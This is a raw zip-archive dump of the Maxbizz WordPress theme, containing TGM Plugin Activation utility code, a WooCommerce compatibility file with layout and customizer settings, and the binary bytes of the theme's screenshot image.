								$this->upgrader->strings['skin_before_update_header'] =esc_html__( 'Installing and Activating Plugin %1$s (%2$d/%3$d)', 'maxbizz' );
							} else {
								// Default installation strings.
								$this->upgrader->strings['skin_upgrade_start'] =esc_html__( 'The installation process is starting. This process may take a while on some hosts, so please be patient.', 'maxbizz' );
								/* translators: 1: plugin name. */
								$this->upgrader->strings['skin_update_successful'] = esc_html__( '%1$s installed successfully.', 'maxbizz' );
								$this->upgrader->strings['skin_upgrade_end']       =esc_html__( 'All installations have been completed.', 'maxbizz' );
								/* translators: 1: plugin name, 2: action number 3: total number of actions. */
								$this->upgrader->strings['skin_before_update_header'] =esc_html__( 'Installing Plugin %1$s (%2$d/%3$d)', 'maxbizz' );
							}
						}
					}

					/**
					 * Outputs the header strings and necessary JS before each plugin installation.
					 *
					 * @since 2.2.0
					 *
					 * @param string $title Unused in this implementation.
					 */
					public function before( $title = '' ) {
						if ( empty( $title ) ) {
							$title = esc_html( $this->plugin_names[ $this->i ] );
						}
						parent::before( $title );
					}

					/**
					 * Outputs the footer strings and necessary JS after each plugin installation.
					 *
					 * Checks for any errors and outputs them if they exist, else output
					 * success strings.
					 *
					 * @since 2.2.0
					 *
					 * @param string $title Unused in this implementation.
					 */
					public function after( $title = '' ) {
						if ( empty( $title ) ) {
							$title = esc_html( $this->plugin_names[ $this->i ] );
						}
						parent::after( $title );

						$this->i++;
					}

					/**
					 * Outputs links after bulk plugin installation is complete.
					 *
					 * @since 2.2.0
					 */
					public function bulk_footer() {
						// Serve up the string to say installations (and possibly activations) are complete.
						parent::bulk_footer();

						// Flush plugins cache so we can make sure that the installed plugins list is always up to date.
						wp_clean_plugins_cache();

						$this->tgmpa->show_tgmpa_version();

						// Display message based on if all plugins are now active or not.
						$update_actions = array();

						if ( $this->tgmpa->is_tgmpa_complete() ) {
							// All plugins are active, so we display the complete string and hide the menu to protect users.
							echo '<style type="text/css">#adminmenu .wp-submenu li.current { display: none !important; }</style>';
							$update_actions['dashboard'] = sprintf(
								esc_html( $this->tgmpa->strings['complete'] ),
								'<a href="' . esc_url( self_admin_url() ) . '">' . esc_html__( 'Return to the Dashboard', 'maxbizz' ) . '</a>'
							);
						} else {
							$update_actions['tgmpa_page'] = '<a href="' . esc_url( $this->tgmpa->get_tgmpa_url() ) . '" target="_parent">' . esc_html( $this->tgmpa->strings['return'] ) . '</a>';
						}

						/**
						 * Filter the list of action links available following bulk plugin installs/updates.
						 *
						 * @since 2.5.0
						 *
						 * @param array $update_actions Array of plugin action links.
						 * @param array $plugin_info    Array of information for the last-handled plugin.
						 */
						$update_actions = apply_filters( 'tgmpa_update_bulk_plugins_complete_actions', $update_actions, $this->plugin_info );

						if ( ! empty( $update_actions ) ) {
							$this->feedback( implode( ' | ', (array) $update_actions ) );
						}
					}

					/* *********** DEPRECATED METHODS *********** */

					/**
					 * Flush header output buffer.
					 *
					 * @since      2.2.0
					 * @deprecated 2.5.0 use {@see Bulk_Upgrader_Skin::flush_output()} instead
					 * @see        Bulk_Upgrader_Skin::flush_output()
					 */
					public function before_flush_output() {
						_deprecated_function( __FUNCTION__, 'TGMPA 2.5.0', 'Bulk_Upgrader_Skin::flush_output()' );
						$this->flush_output();
					}

					/**
					 * Flush footer output buffer and iterate $this->i to make sure the
					 * installation strings reference the correct plugin.
					 *
					 * @since      2.2.0
					 * @deprecated 2.5.0 use {@see Bulk_Upgrader_Skin::flush_output()} instead
					 * @see        Bulk_Upgrader_Skin::flush_output()
					 */
					public function after_flush_output() {
						_deprecated_function( __FUNCTION__, 'TGMPA 2.5.0', 'Bulk_Upgrader_Skin::flush_output()' );
						$this->flush_output();
						$this->i++;
					}
				}
			}
		}
	}
}

if ( ! class_exists( 'TGMPA_Utils' ) ) {

	/**
	 * Generic utilities for TGMPA.
	 *
	 * All methods are static, poor-dev name-spacing class wrapper.
	 *
	 * Class was called TGM_Utils in 2.5.0 but renamed TGMPA_Utils in 2.5.1 as this was conflicting with Soliloquy.
	 *
	 * @since 2.5.0
	 *
	 * @package TGM-Plugin-Activation
	 * @author  Juliette Reinders Folmer
	 */
	class TGMPA_Utils {
		/**
		 * Whether the PHP filter extension is enabled.
		 *
		 * @see http://php.net/book.filter
		 *
		 * @since 2.5.0
		 *
		 * @static
		 *
		 * @var bool $has_filters True is the extension is enabled.
		 */
		public static $has_filters;

		/**
		 * Wrap an arbitrary string in <em> tags. Meant to be used in combination with array_map().
		 *
		 * @since 2.5.0
		 *
		 * @static
		 *
		 * @param string $string Text to be wrapped.
		 * @return string
		 */
		public static function wrap_in_em( $string ) {
			return '<em>' . wp_kses_post( $string ) . '</em>';
		}

		/**
		 * Wrap an arbitrary string in <strong> tags. Meant to be used in combination with array_map().
		 *
		 * @since 2.5.0
		 *
		 * @static
		 *
		 * @param string $string Text to be wrapped.
		 * @return string
		 */
		public static function wrap_in_strong( $string ) {
			return '<strong>' . wp_kses_post( $string ) . '</strong>';
		}

		/**
		 * Helper function: Validate a value as boolean
		 *
		 * @since 2.5.0
		 *
		 * @static
		 *
		 * @param mixed $value Arbitrary value.
		 * @return bool
		 */
		public static function validate_bool( $value ) {
			if ( ! isset( self::$has_filters ) ) {
				self::$has_filters = extension_loaded( 'filter' );
			}

			if ( self::$has_filters ) {
				return filter_var( $value, FILTER_VALIDATE_BOOLEAN );
			} else {
				return self::emulate_filter_bool( $value );
			}
		}

		/**
		 * Helper function: Cast a value to bool
		 *
		 * @since 2.5.0
		 *
		 * @static
		 *
		 * @param mixed $value Value to cast.
		 * @return bool
		 */
		protected static function emulate_filter_bool( $value ) {
			// @codingStandardsIgnoreStart
			static $true  = array(
				'1',
				'true', 'True', 'TRUE',
				'y', 'Y',
				'yes', 'Yes', 'YES',
				'on', 'On', 'ON',
			);
			static $false = array(
				'0',
				'false', 'False', 'FALSE',
				'n', 'N',
				'no', 'No', 'NO',
				'off', 'Off', 'OFF',
			);
			// @codingStandardsIgnoreEnd

			if ( is_bool( $value ) ) {
				return $value;
			} elseif ( is_int( $value ) && ( 0 === $value || 1 === $value ) ) {
				return (bool) $value;
			} elseif ( ( is_float( $value ) && ! is_nan( $value ) ) && ( (float) 0 === $value || (float) 1 === $value ) ) {
				return (bool) $value;
			} elseif ( is_string( $value ) ) {
				$value = trim( $value );
				if ( in_array( $value, $true, true ) ) {
					return true;
				} elseif ( in_array( $value, $false, true ) ) {
					return false;
				} else {
					return false;
				}
			}

			return false;
		}
	} // End of class TGMPA_Utils
} // End of class_exists wrapper
PK�8FZ�?�)�)inc/woocommerce/woocommerce.phpnu�[���<?php
/**
 * WooCommerce Compatibility File
 *
 * @link https://woocommerce.com/
 *
 * @package Maxbizz
 */

/**
 * WooCommerce setup function.
 *
 * @link https://docs.woocommerce.com/document/third-party-custom-theme-compatibility/
 * @link https://github.com/woocommerce/woocommerce/wiki/Enabling-product-gallery-features-(zoom,-swipe,-lightbox)-in-3.0.0
 *
 * @return void
 */
function maxbizz_woocommerce_setup() {
	add_theme_support( 'woocommerce' );
	add_theme_support( 'wc-product-gallery-zoom' );
	add_theme_support( 'wc-product-gallery-lightbox' );
	add_theme_support( 'wc-product-gallery-slider' );
}
add_action( 'after_setup_theme', 'maxbizz_woocommerce_setup' );

/**
 * WooCommerce specific scripts & stylesheets.
 *
 * @return void
 */
function maxbizz_woocommerce_scripts() {
	wp_enqueue_style( 'maxbizz-woocommerce-style', get_template_directory_uri() . '/css/woocommerce.css' );
	if ( class_exists( 'woocommerce' ) ) {
		wp_enqueue_style( 'maxbizz-woocommerce-style' );
	}
}
add_action( 'wp_enqueue_scripts', 'maxbizz_woocommerce_scripts' );

/**
 * Add 'woocommerce-active' class to the body tag.
 *
 * @param  array $classes CSS classes applied to the body tag.
 * @return array $classes modified to include 'woocommerce-active' class.
 */
function maxbizz_woocommerce_active_body_class( $classes ) {
	$classes[] = 'woocommerce-active';

	return $classes;
}
add_filter( 'body_class', 'maxbizz_woocommerce_active_body_class' );

/**
 * Product gallery thumnbail columns.
 *
 * @return integer number of columns.
 */
function maxbizz_woocommerce_thumbnail_columns() {
	return 4;
}
add_filter( 'woocommerce_product_thumbnails_columns', 'maxbizz_woocommerce_thumbnail_columns' );

/**
 * Related Products Args.
 *
 * @param array $args related products args.
 * @return array $args related products args.
 */
function maxbizz_woocommerce_related_products_args( $args ) {
	$defaults = array(
		'posts_per_page' => 4,
		'columns'        => 4,
	);

	$args = wp_parse_args( $defaults, $args );

	return $args;
}
add_filter( 'woocommerce_output_related_products_args', 'maxbizz_woocommerce_related_products_args' );

/**
 * Remove the breadcrumbs 
 */
add_action( 'init', 'maxbizz_wc_breadcrumbs' );
function maxbizz_wc_breadcrumbs() {
    remove_action( 'woocommerce_before_main_content', 'woocommerce_breadcrumb', 20, 0 );
	add_action( 'maxbizz_woocommerce_breadcrumb', 'woocommerce_breadcrumb' );
}

/**
 * Change several of the breadcrumb defaults
 */
add_filter( 'woocommerce_breadcrumb_defaults', 'maxbizz_woocommerce_breadcrumbs' );
function maxbizz_woocommerce_breadcrumbs() {
    return array(
            'delimiter'   => '',
            'wrap_before' => '<ul id="breadcrumbs" class="breadcrumbs" itemprop="breadcrumb">',
            'wrap_after'  => '</ul>',
            'before'      => '<li>',
            'after'       => '</li>',
            'home'        => _x( 'Home', 'breadcrumb', 'maxbizz' ),
        );
}

/**
 * Remove the product link 
 */
remove_action( 'woocommerce_before_shop_loop_item', 'woocommerce_template_loop_product_link_open', 10 );
remove_action( 'woocommerce_after_shop_loop_item', 'woocommerce_template_loop_product_link_close', 5 );

remove_action( 'woocommerce_shop_loop_item_title','woocommerce_template_loop_product_title', 10 );
add_action('woocommerce_shop_loop_item_title', 'maxbizz_change_products_title', 10 );
function maxbizz_change_products_title() {
    echo '<h2 class="woocommerce-loop-product__title"><a href="'.get_the_permalink().'">' . get_the_title() . '</a></h2>';
}

/**
 * Remove default WooCommerce wrapper.
 */
remove_action( 'woocommerce_before_main_content', 'woocommerce_output_content_wrapper', 10 );
remove_action( 'woocommerce_after_main_content', 'woocommerce_output_content_wrapper_end', 10 );

if ( ! function_exists( 'maxbizz_woocommerce_wrapper_before' ) ) {
	/**
	 * Before Content.
	 *
	 * Wraps all WooCommerce content in wrappers which match the theme markup.
	 *
	 * @return void
	 */
	function maxbizz_woocommerce_wrapper_before() {
		?>
		<div id="primary" class="content-area <?php maxbizz_shop_content_columns(); ?>">
			<main id="main" class="site-main" role="main">
			<?php
	}
}
add_action( 'woocommerce_before_main_content', 'maxbizz_woocommerce_wrapper_before' );

if ( ! function_exists( 'maxbizz_woocommerce_wrapper_after' ) ) {
	/**
	 * After Content.
	 *
	 * Closes the wrapping divs.
	 *
	 * @return void
	 */
	function maxbizz_woocommerce_wrapper_after() {
			?>
			</main><!-- #main -->
		</div><!-- #primary -->
		<?php
	}
}
add_action( 'woocommerce_after_main_content', 'maxbizz_woocommerce_wrapper_after' );

/**
 * Sample implementation of the WooCommerce Mini Cart.
 *
 * You can add the WooCommerce Mini Cart to header.php like so ...
 *
	<?php
		if ( function_exists( 'maxbizz_woocommerce_header_cart' ) ) {
			maxbizz_woocommerce_header_cart();
		}
	?>
 */

if ( ! function_exists( 'maxbizz_woocommerce_cart_link_fragment' ) ) {
	/**
	 * Cart Fragments.
	 *
	 * Ensure cart contents update when products are added to the cart via AJAX.
	 *
	 * @param array $fragments Fragments to refresh via AJAX.
	 * @return array Fragments to refresh via AJAX.
	 */
	function maxbizz_woocommerce_cart_link_fragment( $fragments ) {
		ob_start();
		maxbizz_woocommerce_cart_link();
		$fragments['a.cart-contents'] = ob_get_clean();

		return $fragments;
	}
}
add_filter( 'woocommerce_add_to_cart_fragments', 'maxbizz_woocommerce_cart_link_fragment' );

if ( ! function_exists( 'maxbizz_woocommerce_cart_link' ) ) {
	/**
	 * Cart Link.
	 *
	 * Displayed a link to the cart including the number of items present and the cart total.
	 *
	 * @return void
	 */
	function maxbizz_woocommerce_cart_link() {
		?>
		<a class="cart-contents ot-minicart" href="<?php echo wc_get_cart_url(); ?>" title="<?php esc_attr_e( 'View your shopping cart', 'maxbizz' ); ?>">
			<i class="ot-flaticon-business"></i>
			<?php
			$item_count_text = sprintf(
				/* translators: number of items in the mini cart. */
				_n( '%d', '%d', WC()->cart->get_cart_contents_count(), '_s' ),
				WC()->cart->get_cart_contents_count()
			);
			?>
			<span class="count"><?php echo esc_html( $item_count_text ); ?></span>
		</a>
		<?php
	}
}

//Get layout shop page.
if ( ! function_exists( 'maxbizz_get_shop_layout' ) ) :
	function maxbizz_get_shop_layout() {
		// Get layout.
		if( is_product() ){
			$page_layout = maxbizz_get_option( 'single_shop_layout' );
		}else{
			$page_layout = maxbizz_get_option( 'shop_layout' );
		}

		return $page_layout;
	}
endif;

/**
 * Set the content width in pixels, based on the theme's design and stylesheet.
 *
 * Priority 0 to make it available to lower priority callbacks.
 *
 * @global int $content_width
 */
if ( ! function_exists( 'maxbizz_shop_content_columns' ) ) :
	function maxbizz_shop_content_columns() {

		$shop_content_width = array();

		// Check if layout is one column.
		if ( 'content-sidebar' === maxbizz_get_shop_layout() && is_active_sidebar( 'shop-sidebar' ) ) {
			$shop_content_width[] = 'col-lg-9 col-md-9 col-sm-12 col-xs-12';
		}elseif ('sidebar-content' === maxbizz_get_shop_layout() && is_active_sidebar( 'shop-sidebar' ) ) {
			$shop_content_width[] = 'col-lg-9 col-md-9 col-sm-12 col-xs-12 pull-right';
		}else{
			$shop_content_width[] = 'col-lg-12 col-md-12 col-sm-12 col-xs-12';
		}

		// return the $classes array
    	echo implode( ' ', $shop_content_width );
	}
endif;

/**
 * Register widget area for shop page.
 *
 * @link https://developer.wordpress.org/themes/functionality/sidebars/#registering-a-sidebar
 */
function maxbizz_woocommerce_widgets_init() {
    register_sidebar( array(
        'name'          => __( 'Shop Sidebar', 'maxbizz' ),
        'id'            => 'shop-sidebar',
        'before_widget' => '<section id="%1$s" class="widget %2$s">',
        'after_widget'  => '</section>',
        'before_title'  => '<h6 class="widget-title">',
        'after_title'   => '</h6>',
    ) );
}
add_action( 'widgets_init', 'maxbizz_woocommerce_widgets_init' );


/* Customizer Shop */
function maxbizz_shop_customize_settings() {
	/**
	 * Customizer configuration
	 */

	$settings = array(
		'theme' => 'maxbizz',
	);

	$panels = array();

	$sections = array(		
        'single_product'           => array(
			'title'       => esc_html__( 'Single Product', 'maxbizz' ),
			'description' => '',
			'priority'    => 16,
			'capability'  => 'edit_theme_options',
			'panel'       => 'woocommerce',
		),
	);

	$fields = array(
		// Shop Page
		'shop_layout'           => array(
			'type'        => 'radio-image',
			'label'       => esc_html__( 'Shop Layout', 'maxbizz' ),
			'section'     => 'woocommerce_product_catalog',
			'default'     => 'content-sidebar',
			'priority'    => 7,
			'description' => esc_html__( 'Select default sidebar for the shop page.', 'maxbizz' ),
			'choices'     => array(
				'content-sidebar' 	=> get_template_directory_uri() . '/inc/backend/images/right.png',
				'sidebar-content' 	=> get_template_directory_uri() . '/inc/backend/images/left.png',
				'full-content' 		=> get_template_directory_uri() . '/inc/backend/images/full.png',
			)
		),		

        // Single Product Page
        'single_shop_layout'           => array(
            'type'        => 'radio-image',
            'label'       => esc_html__( 'Single Product Layout', 'maxbizz' ),
            'section'     => 'single_product',
            'default'     => 'content-sidebar',
            'priority'    => 1,
            'choices'     => array(
				'content-sidebar' 	=> get_template_directory_uri() . '/inc/backend/images/right.png',
				'sidebar-content' 	=> get_template_directory_uri() . '/inc/backend/images/left.png',
				'full-content' 		=> get_template_directory_uri() . '/inc/backend/images/full.png',
			)
        ),
        'page_title_product'    => array(
            'type'     => 'text',
            'label'    => esc_html__( 'Title Page Header', 'maxbizz' ),
            'section'  => 'single_product',
            'default'  => 'Shop Single',
            'priority' => 1,
        ),
	);

	$settings['panels']   = apply_filters( 'maxbizz_customize_panels', $panels );
	$settings['sections'] = apply_filters( 'maxbizz_customize_sections', $sections );
	$settings['fields']   = apply_filters( 'maxbizz_customize_fields', $fields );

	return $settings;
}

$maxbizz_customize = new Maxbizz_Customize( maxbizz_shop_customize_settings() );PK�8FZ~FXi"i"screenshot.jpgnu�[������ExifII*��Ducky<���http://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:bc1dab97-766a-6449-8250-d7c02e947a21" xmpMM:DocumentID="xmp.did:CCFE1978C80411EA99D1C5267B8A9BFE" xmpMM:InstanceID="xmp.iid:CCFE1977C80411EA99D1C5267B8A9BFE" xmp:CreatorTool="Adobe Photoshop 21.1 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:53754303-2d90-4241-93a3-4c3ce69d1ebb" stRef:documentID="adobe:docid:photoshop:cf5488fd-21e1-2043-8034-7cb72c1b1fd2"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>��&Adobed�

�=�Fe�"g���		





������ 01@!P`"25pA34B#$�%��CD6		!1AQ"2aq����34 0��Br��#@Rb�sP`���CS�$��c�tp����	!1 p�����@�Aaqb!1AQa q0�@���P`��p���������A� d$�A H �	�Ib �H$�*H.	$*�RIĀ����L�*T��IH.HbĀ*AH(@I$J� ����*L�d��2�I`*	,T�Ir�@$�� &@Ir�,H �P��1�X�RbJ����	.����*@	$�R�@��ʀ� T��T���RK���(@�r��ǩ�ǮL�����b@ $�`	�BA$�	 �K�P�I*ǿ���Y�_���8��}��G��AAELIsL�Ar�T�� ��2��T�$�HP��|�g����~k�í�_�MMO�������y����8U裰s̓X�<%}:��پbϛh�X�L�Ld�H�@,X�	$H1�1�?���\�M�=��Z�lg_/�'���2�2��S�eu����3|
��9ϓW���U'���JL��
�`bAA$�T�$� � a�������}�_�����6��3�ߣ���|��H��ۏA��垜�$sVy3�^R��X1�B��IP@$A�t���y{��g�O}�=�W���xz?�s�o#�>l�APs b.\1�H�J��H H	,T�3
I�T��� T�B�@.c@��RIJ	�@ĀR��L��2(e$�.H0�$���T���)R��\��@$�,P�pc*�I��A�2�T��R��\�B2K�1�L�"�S.X�2�,H�@$@ T�jP6�R�X��e$���`T�c�"�T Ip��r��js��A �P��{��N��|�Ah�L�ڏ��>i��nZg�<Ukբ�-�h�EhZ-V
e�P�s �XP%���	��}".y�Қ�Q~g��yC���c�5�c������S�9�g�u>��ʲ�ȴ�G�3|U�A�L_g��h���#�n��4��o"�9�z3P����i
�2*c�,(b�T�.�.��/µ;%���_s�yk.���S�q��<�}/���`|�����]N�b.wO��У�Z};.��xz�U�L_��rϥǚ6�F��7�}_��}r6e���X�4i��V
�`A�K1���.�q�p��]>��@���5�h��b���y���ڞ�9���>}]��hW��E��i��F̿5��l�3���^x�1�=��y��*��y�לc�׸�'����(\�H%�`�pT���#d���2�S
, �A�*Te$�T.$��� �*e� $���0�1�ͳ����Rh���׏���d���2c�P\	R�����ơĭ�Os��:q���sORx�ٍ�ُ^��ǁ�Jvc�֥w�빿(���9Gϫӝ��5�l�Wj>y^��ǁ�zL��0P\	
���\����P��>�/ŵ>ћ�}O��7�̿<��|�O��4Oi/���W��|]�B��>��
ORz��9G���٢{Y~wg�2.����l�>m�e,1��%��@>���;G��S<�{�߉j}�7暞�7��ï*t��G���9�&�mv�qL�X�;�}�����F�=��&�e}/7嚞�2f����l�W���0�(�z�
��^�*y3ӞV�ѼT�9�mGd��c�.��Z<]w��x��C�G�7ͳ��;Q����I�:�j<]`�K`c�`�H*�T��,`E`�T�b�J�I�T��$�%�`+@X $�@�	�R� f)`8�V�`%���K�H3��`d0�b@�J�e,e@,A&S3H��r� � 	T�B��\���F�00�@ \�1�b� e$�\��.e0�\$T���(�����\���C0��31�%�H ��A�r�pH�1�g0X�a2T�c+@e0�%�AH��o\(I�$�,P�ǍD�}fڀ9'��$@b*��\�`,���"�X�~��sx�7���x��u��hy�9�s���A��:�����'7Y�c6�: ��z�s���f̛���S!���P.P�1��e(A�H��_4@�`2�@7@(`1�	1�7���@�͵��$PI ,e1R�M�PA�\�;�$� T�	 	 �	�����g0��(A%��T�P�Is�-@�.qSj�g:��Z�M�z�$ְt%�1��*�V�ї1ʲ���&��`�t��N}�6e�a@V\�Rh����@0��1�L�Ċ@e͉o˯G:��崲 �A`ASTԹ�8Ѳ�&iw�0YRŌ�N�@�1�Y�śH�Yu��b��@g@��T�����;%�7�7WtK[
!����B�&�̐\��ru3Mt9�u��u�g���6v��k˫.Ř1�f{3�@>g�ܱ4�@��`f0��*_|�Wg)��f���ٗ�c�J�@ �C�,���i�sb@צu�9���rJ7s��so���6w&�$�]urح|�K�S=�M�1ԹbhCd����rJ�@.�D/�sQ{.m�X�t1�G�v(��ecf�c
��s�d�^i\��k��u���x�]S�
�k=�n�5L�0eEس6�����r��P�@rH0\
��*_�4�ZYBN�7���Y��۹��6�sʐ	X*��B�M�o.+1�%��;��cθ1��۩s��Mix�㡬b�˺��A�a��	iz��%O�U�@(c&BK���T�Na^}�.�n���xuyv�g^c�
��Ǿ��緾v$�F3]����K�`��4npX ���r�֑���{fL�Z�ijZ��c�˲�R"+R1�CUw�%1�>sW,M1��C1`b(�*KX������r맬���:<��9vۖ��&���%ɖ�ӓ%l[��+3I���+�\R�(��]r���j̸��_N}<o�ӏF�L�V���.�2V֦2�>ym�@����F
f,f0���Tɾ{9�S����{�=׏k�M�|�^>�:�ζ�ӏ��Q���M�Tšь�کĴ��h��I�].]���3u���{7�ӟK:�K�yn�z8ߦ���-@1٠Z,`���ȿ>[�HM��P�R�pP����J@ASz�k�<�����z�����x��}:���k:�9��u�mt��.4�Ae��	Z�-LIX�ӹ��\ɝ�c�I|�L�f���c~o�7$��ye��x�w��G�;� ���#6�Ms��X� �$ ���T� P�H$@@ AC�7��g�M�/r2׋���s�^�WW�L�9u�kʚ��[|�0��݂�BԈ��2.��,�$�qӟ5�3����;.sYcu��X�k�S�)-���s�L9g�
h���7rI���V\���S=�Ƥ�c5��d��T�T�	�"	�������h�|M�1�yz2��eK
 ���6�y1�;8�����{��3:ϔ��ܗ�ޖ:�ct�޹��Wk|�e,FC�9��`�:G �Ys^ʠ�u�9���zb�f2�.�d1.��˳�^}>��+9�;2��i��j�9�s)zI ��.�*�R��Űk�H�"FY@2��I	e�
�1��Gw�m
M�wd+����=���c|��.�p���o�.|�u�E
Á]�vNi�5I�`�/�hc�6̓x3Һ�i���&|�4�����
�^^�NY@ �g*�r\f65y�:�g>�����|��mLF��X�5����lI�\�6ϝ����r�,��y��_�H��	�ҁ0Q�c�y�	��r��D�E�i&�cD�lMct��c7���s��s�fSj2�zϓ��>u�7l�Ϧ\��|�Y�G|�]9P֙Ʒ3m̵ �LP�Qf�0A���\fΰ�f���<2�5�9}��ϻ�}�g>��d�`����X��
�u�\iVI>����ٰ`�A��
�,\�5k�k'������t��~�6$�"*N;f��.�>�.>�M����1�{�r�=8 �%!+5��)�s�gj]�Ȟc�>gNRo�^�;�9<�ogPkYэ}g���μw��[�s�:F��`6]����9v��#,��s�6��5�s�����]K��Lܘ
׹峼�)+�;���=F�I��@ T+.�uI��c.� ���@�ܻX�h��8듗�ZY7x�q�85�VJ\���
J�����Qsy�}�@	��x�\7���CY�η
;<�n��[:�:k�l�cZ�f��9I�];�
w�:�:1�PX��ҫ�<��t�K��3Mfγg�O��V8�Z[Ɩ��Me��k
f�0���g}�2R]~~�;�dߞ.jw��ٳ*Z�*ANO.�<z�2M�c�ێ�������X�h��8듗�1�=fXIQ�X�t+d��	iks�u:� ���<�Z\ZϤ���MŢy����-ezX�.�:r��߳o7Rk�/����ѳ��-:K��(P�5�D�Y�i��5�s���m�G�]��(M
�5�M��ז��
k9��5�1f����6��V�S��s��� ��j����ǽLvQu�z�~�^U �pI ���V$�"*N:���ir�bK[-,�-s���	3�b˃|�D$��s�#�����L�ן������F�:�9v�������W�κ�l��Y+�s{56b��.U �f���X�ۑ�iI���k=7yvߖ�����=�ӞJ�2�&��=7f�ͮ�y9���zy�k�+��fk,@ �*�
,t�__o�~�u��~w�=;6s���M���� �L�$�+$���$�Rq�'/H2gW�,&;��EC ���d�Ϟ����y�}��B� e�9zc��=|tc�
�<��Mt��{���9�xJT��.n�2k*i�\�z�Y	b�&չ�MSP�}����>�u�=�陥ˎ����k���ޱ�f`]sM
K�\�:<�2kjrzs޼��
OIۆ͙l� �
�
�+�}�/��q�*�vc�
��]����?c� �2ر)bIQ)�/�ē@EKc�N^� irgu����2��J̷�����ʗ8��_:���ɝc�1�3�<.���|u�e�l����;�+�Z�6���&ko|�c6e۶��*PҹԳZ1���|�d�;ξ�	��g$�
ƚk����fXK��:
-cF4�{�.5�-�+S+4�5u�Yێՙ��f
AJ�oOw�����k|�gx�pMh.���Ǚ��>bA�r.X�I+)'���M-��x�����,�-R���M^�F�>��5zr �kP�����Z[K[�Z�/���$\X鯎�X̓V��Ǽ�����'A3�d�Y��K�����(��l�\��#i�ܻh�ڔ�o�͙�2܄�^���mUM��ή�l�;bε&����h.�������G�����)*����/�۾�u��%��mk�<Μ���&��Rc)��r�b�$�x/�ē@ELܽ�l���b� 	���[gC�.�>�]|�-�.ֱ�S{�}wΩs�X�7K�_����d��k[�l��D��Y;<��>���8#5eK�[�k�36�6%���$���&�VKcxe���dș�X��d�6
�Eo.Ĺe��D֎w	m�ٮ^:R��}kX�G����v�5	R�*�7��/gCY��Ƭa]S@��Ʒ�Ň�2E��s"\�X�d��$�S7/F��+�\�������2t.KΗv�Id�M�8�v�-�&w����}52��q��8��������ˇ�j��=޷�X�%�7�l�Ϭ$�dQ$�٤�
d�^[���ԅ�Vx,
��ؗ6w�����;��|۫�����:���tM�����BT����ߙ�����k�ⲥ�fo�Ӗ���>+K$�2�l�d-W$��~_]�&���y���z|}V����@�OE�[�AT���Û�\�\��5���������X7ˉ.�l��=�*�^�S%�u�^��]���?��ۊ���t�ǧ7�����:�\���
d�H9�:)��k�XȴKfE�H"̳WLu�0�ʛ��n�vΩ5TӸ�qѺǝi㦤���=x�M��u���$*Uqٿ�]r�CE9����n���gZ�f?_ͱ�l�e�"d-V�xO/�ē@EKc�n>��f�>�~�<z�s��Q1E奊ɝe���lZ^��p�jk��N4�����>!E�vc�ϥ��Ϧϛ�Q�[�n^��yw�3Yƺ^�e�V�.�i��ʜ�2�ܤ���Y@.d:��A����t�s=#�N^;c]���sɮz:�m�9�7�Z����G����w�%R
�ZY��v��=9����N��#
������2��fS"X�5�<��M'~���3��g�;-.l��T�ìe��k�Ke���?����[:>��[��{y.kc�cO?���y���Na��unx�Y�q㯞�?PB�\�=�{ؚ�	
ٮ.�i���L�κbM�ȵ$�/k�y5Ή�Լ���	RAr���EhI���S�˵.�/O+=�'A�E��Ӎ�ͬج��]k5�:��G����w�%R
�ZY\��sFݍgϵ�7�����ǃ��VP$�f�1�˖KxO7�ē@EI�_��^w|VzV��Ai�����q���P�^�w_.-ga:35��8�\�b����멾;6jgz��{�k,��u�}?�)6IYb_I�o�@���/�n����$�βl.u�&�>���3\þ|��6��`B����ƅ�r�I;y��֯>���+�gj�ɳ�e��E�e����g�/nms�/5߀���B����~�3;Ӻ��ҹ�u��k>��]JDK&���2%���V���bI�"����>�lt��q���7��0k�b(L�D��Eu-.�:���[K��t���L�ޏN��G�|	�^�\�ע�ס�$�0�Z\�U;z�D��bM��%���IkU4�v��:P�X,�m�(��6x�:�[Z�����DڳX�sd�f�i��L�����6�9ח��UH ��'O���˿O�ne���3}���ˏ��㖤J ���S1r�I�ε�ǟ�bI�"����>�\t%u4{yksZ�d�L��u��M�]��z0o��4��>�3�^������|�P�����5�����K�U�s_ɵ��R�z>]zؚI,�y�+�M��ْ�.q��ʢ�t���,Ƹw�g�D�6gIYK�R�R*�
��z͝f�l��e�5�Jg��s�fα;�:��N��yμ��n
�
.;1��oWO�M�t�c����Nj���.w��"��͔�]/R\��y�6$�"*_�n���e�H+s���K��.����4{�i���]�x�p,˿�ճϿ7��˝�#�����\�����%������� �R�7���I$����d��g��dI����(+S��q9�筤�rAT�
� 鵖X�*c�����݌��c��幚G���ms�/3ۂʕ*R������8��u���nr�]���z|�D�S)�dK���$�x?7�ē@EK����},��1�=���d���c��_<Y+��M�}�k�xL�|�q�C���5�������ɝ���׌s�Z�Nn�N7ε���� �o���*A �����˛�fL�r��٣d�[~dBho�O���N7cf̀KT�S�6 �,��1�Jk��ok,��#�K�6�7ח������G/SSqg�o���b��<�4��Mn�~w���g��ٺg/e��I��zlI4DT�������8�ʥnrc�L�:=����M�}�x�p^9s��>���3����/F�:����M�]�{pɍ�p��|�a�<:�>��QL�O��ԂbW�.�����H[��g�ۅ�Nn}�F5�g��ž}L���ٌ�qR�������Ld(A%��h�]x�n�b�ә���Iq_P�z�|~�\��v�^����=!�ķ�$�cl޳!�/WKT���ؒh��������&Ɏ�S�
\�"�s�9�l�������s���iv�Yw�z�9��|4�z<={������w�������a�=�uþv�Ŭ`�>�R		k:�צ��u}�"�>nSnkr�%�s�
���Ǽ��qqK����8ɱ-��.H$�V}Ni��(f0IzIz&��:��>�?/xӬ���H���z?#�Rkv;y�ޏ/�z���V\�^�GC:�.{2%Y-RI�7�ē@EM�^����d��d��TǬ`�/�NuK�>�h�K�Ϯ�/F=�[�	]�]�㦗o5l���6:i���kk�}.�]�}��
